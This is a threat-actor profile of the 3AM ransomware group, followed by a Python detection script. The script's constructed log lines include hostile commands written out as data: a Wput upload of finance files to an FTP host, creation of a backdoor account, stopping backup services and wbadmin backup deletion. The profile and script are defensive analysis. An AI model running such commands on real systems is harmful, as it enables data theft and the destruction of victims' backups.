
3AM Ransomware – Threat Actor

February 11, 2025
in Ransomware Group, Threat Actors

3AM Ransomware

Date of Initial Activity

2023

Location

Unknown

Suspected Attribution

Ransomware Group

Motivation

Financial Gain

Software

Servers
Database

Overview

The 3AM ransomware group is a newly emerged cybercriminal threat. It was first observed by Symantec's Threat Hunter Team in a single intrusion in which an affiliate attempted to deploy the well-known LockBit ransomware, was blocked by the victim's defenses, and then fell back to 3AM, a previously unknown strain. Swapping payloads in response to a blocked deployment reflects a growing trend among ransomware affiliates, who adjust their approach quickly based on what a target's defenses stop. 3AM has so far been used only sparingly, but a working, independently developed family is a sign that it may become a more prominent player in the ransomware landscape. What makes 3AM particularly notable is that it is written in Rust, a language that is still uncommon in malware and whose compiled binaries are less well covered by analysis tooling and detection signatures than the C/C++ payloads most ransomware is built from; this makes the binary harder to analyze and somewhat more resilient against traditional security solutions. 3AM also disables security and backup services on the infected host before encrypting, a technique shared with many ransomware families, but one that 3AM applies in a targeted way that further complicates recovery.

Common targets

Health Care and Social Assistance

Information

United States

Attack Vectors

Phishing

Software Vulnerabilities

How they operate

At the outset of the observed attack, 3AM's operators used common penetration-testing tools to escalate privileges and map the target network. One of the first signs of their presence was the gpresult command, used to dump the Group Policy settings applied to a host so the attackers could see which security policies were in force. They then used Cobalt Strike components and PsExec to execute commands and gain higher levels of access; PsExec in particular let them run commands on remote systems and so move laterally across the network. Reconnaissance commands such as whoami, netstat, and net share were run to enumerate the environment, identifying shared resources and further systems to compromise.

Once sufficient access had been gained, the attackers prepared the environment for deployment. They added a new user account for persistence and used the Wput utility to exfiltrate files to an FTP server under their control. This phase typically also involves scanning the network for backup systems and sensitive files. It was at this stage that the affiliate first tried to deploy LockBit; when that attempt was blocked, they switched to 3AM instead. This ability to swap payloads in reaction to defensive controls is the defining characteristic of the group's operational methodology.

3AM itself is controlled through command-line parameters: -k takes a 32-character Base64 "access key" (the key referenced in the ransom note), -m selects the method, local or net, i.e. whether encryption runs on the local host only or across the network, and -s sets offsets within files to trade thoroughness for encryption speed.

Before encrypting, the malware stops security and backup services, Veeam and Acronis among them, so that restoration tooling is unavailable; wbadmin.exe is used to delete backup copies, and after encryption the ransomware also attempts to delete Volume Shadow (VSS) copies. It then enumerates files matching predefined criteria, encrypts them, appends the .threeamtime extension, and deletes the originals. A ransom note named "RECOVER-FILES.txt" is written to each affected directory, stating the demand and threatening to sell the victim's sensitive data on the dark web if the ransom is not paid. The note plays on the mystique of "3 AM" to pressure victims into acting immediately and warns that independent recovery attempts may lead to permanent data loss.

What makes 3AM dangerous is the combination of targeted preparation, destruction of backups and shadow copies, and extortion tied to exfiltrated data: files are encrypted, recovery paths are removed, and the stolen data is held over the victim as a second lever. The group's reliance on common penetration-testing tools for reconnaissance and lateral movement, followed by a controlled ransomware deployment, is enough to bypass many traditional defenses. The lesson for defenders is the value of offline or immutable backups, network segmentation, and detection of the pre-encryption staging (policy dumps, PsExec use, new local accounts, FTP uploads, service stops, and wbadmin backup deletion) rather than of the payload alone. As the group continues to refine its methods, 3AM is likely to become an increasingly significant player in the global ransomware landscape.
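The staging chain described above is more detectable than the encryptor itself, because each step runs a well-known command. The following is an added detection example, not code from CyberMaterial or from the Symantec report: it scores a host's simplified process- and file-event telemetry against the stages of the 3AM intrusion (gpresult, whoami/netstat/net share, PsExec, net user /add, Wput to FTP, service stops, wbadmin deletion, the -k/-m switches, the .threeamtime extension and RECOVER-FILES.txt). The log lines are constructed for the example, the -k value is a made-up string, and the regular expressions are starting points (assumptions) rather than vendor-validated signatures; the vssadmin rule is a generic ransomware indicator added for completeness, not something the write-up attributes to 3AM.

```python
"""
Added detection example (not CyberMaterial's or Symantec's code): flag the
3AM-style pre-encryption chain in simplified process- and file-event telemetry.
SAMPLE_LOG is constructed for this example; the regexes are assumptions.
"""
import re
from collections import defaultdict

# Constructed telemetry (not real logs): host|timestamp|kind|detail, where kind
# is "proc" (command line of a created process) or "file" (path written).
# The -k value is a made-up 32-character Base64 string, not a real key.
SAMPLE_LOG = """\
WS-01|2023-09-08T01:02:11Z|proc|C:\\Windows\\System32\\gpresult.exe /z
WS-01|2023-09-08T01:03:40Z|proc|whoami
WS-01|2023-09-08T01:03:52Z|proc|netstat -ano
WS-01|2023-09-08T01:04:10Z|proc|net share
WS-01|2023-09-08T01:20:05Z|proc|PsExec64.exe -accepteula \\\\FS-02 -s cmd.exe /c whoami
WS-01|2023-09-08T01:31:17Z|proc|net user svc_backup P@ssw0rd! /add
WS-01|2023-09-08T02:05:44Z|proc|wput.exe C:\\Finance\\*.xlsx ftp://198.51.100.23/upload/
WS-01|2023-09-08T02:40:02Z|proc|net stop VeeamBackupSvc
WS-01|2023-09-08T02:40:09Z|proc|wbadmin.exe delete systemstatebackup -keepVersions:0 -quiet
WS-01|2023-09-08T02:41:00Z|proc|C:\\Temp\\locker.exe -k 6TCqjrxMGzpTJhRktyrh7UhpXGbYJ1QW -m local
WS-01|2023-09-08T02:41:30Z|file|C:\\Finance\\Q3.xlsx.threeamtime
WS-01|2023-09-08T02:41:31Z|file|C:\\Finance\\RECOVER-FILES.txt
WS-02|2023-09-08T09:15:00Z|proc|netstat -ano
WS-02|2023-09-08T09:16:00Z|proc|ipconfig /all
"""

# (stage, description, pattern) applied to "proc" command lines. Stages mirror
# the write-up: recon -> lateral -> persist -> exfil -> impact -> payload.
PROC_RULES = [
    ("recon", "gpresult dumps Group Policy", re.compile(r"\bgpresult(\.exe)?\b", re.I)),
    ("recon", "whoami/netstat/net share enumeration",
     re.compile(r"\b(whoami|netstat)(\.exe)?\b|\bnet(\.exe)?\s+share\b", re.I)),
    ("lateral", "PsExec remote execution", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    ("persist", "local account created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("exfil", "Wput upload to FTP", re.compile(r"\bwput(\.exe)?\b.*\bftp://", re.I)),
    ("impact", "backup/security service stopped",
     re.compile(r"\b(net1?|sc)(\.exe)?\s+stop\s+\S*(veeam|acronis|vss|backup|sql)", re.I)),
    ("impact", "wbadmin deletes backups", re.compile(r"\bwbadmin(\.exe)?\s+delete\b", re.I)),
    # Generic ransomware indicator (assumption, not specific to 3AM).
    ("impact", "shadow copies deleted", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("payload", "3AM-style switches: -k <32 Base64 chars> and -m local|net",
     re.compile(r"(?=.*\s-k\s+[A-Za-z0-9+/=]{32}(\s|$))(?=.*\s-m\s+(local|net)\b)", re.I)),
]

# Patterns applied to "file" paths: the artefacts 3AM leaves on disk.
FILE_RULES = [
    ("payload", "encrypted file extension .threeamtime", re.compile(r"\.threeamtime$", re.I)),
    ("payload", "ransom note RECOVER-FILES.txt", re.compile(r"[\\/]RECOVER-FILES\.txt$", re.I)),
]


def verdict(stages):
    """Rank a host by how far along the chain its matched stages reach."""
    if "payload" in stages:
        return "critical: ransomware artefacts present"
    if "impact" in stages and stages & {"recon", "lateral", "persist", "exfil"}:
        return "high: staging activity plus backup destruction"
    if len(stages) >= 2:
        return "medium: multi-stage intrusion activity"
    return "low: isolated indicator"


def analyze(log_text):
    """Return {host: {"stages": set, "hits": [(ts, stage, desc, detail)], "verdict": str}}."""
    findings = defaultdict(lambda: {"stages": set(), "hits": []})
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        host, ts, kind, detail = raw.split("|", 3)
        rules = PROC_RULES if kind == "proc" else FILE_RULES
        for stage, desc, pattern in rules:
            if pattern.search(detail):
                findings[host]["stages"].add(stage)
                findings[host]["hits"].append((ts, stage, desc, detail))
    for entry in findings.values():
        entry["verdict"] = verdict(entry["stages"])
    return dict(findings)


if __name__ == "__main__":
    for host, entry in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{host}: {entry['verdict']}")
        for ts, stage, desc, detail in entry["hits"]:
            print(f"  {ts} [{stage}] {desc}: {detail}")
```

In production the constructed lines would be replaced by Sysmon Event ID 1 (CommandLine) and Event ID 11 (TargetFilename) records or the equivalent EDR fields. The ranking deliberately treats "impact" indicators seen together with any earlier stage as high priority: by the time the "payload" stage fires (the .threeamtime extension or the ransom note), encryption is already under way, so the pre-encryption stages are where an alert still buys time to isolate the host.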
References:
  • 3AM: New Ransomware Family Used As Fallback in Failed LockBit Attack
Tags: 3AM ransomware, Cobalt Strike, Health Care, LockBit, PsExec, Ransomware, Symantec, Threat Actors, United States, Vulnerabilities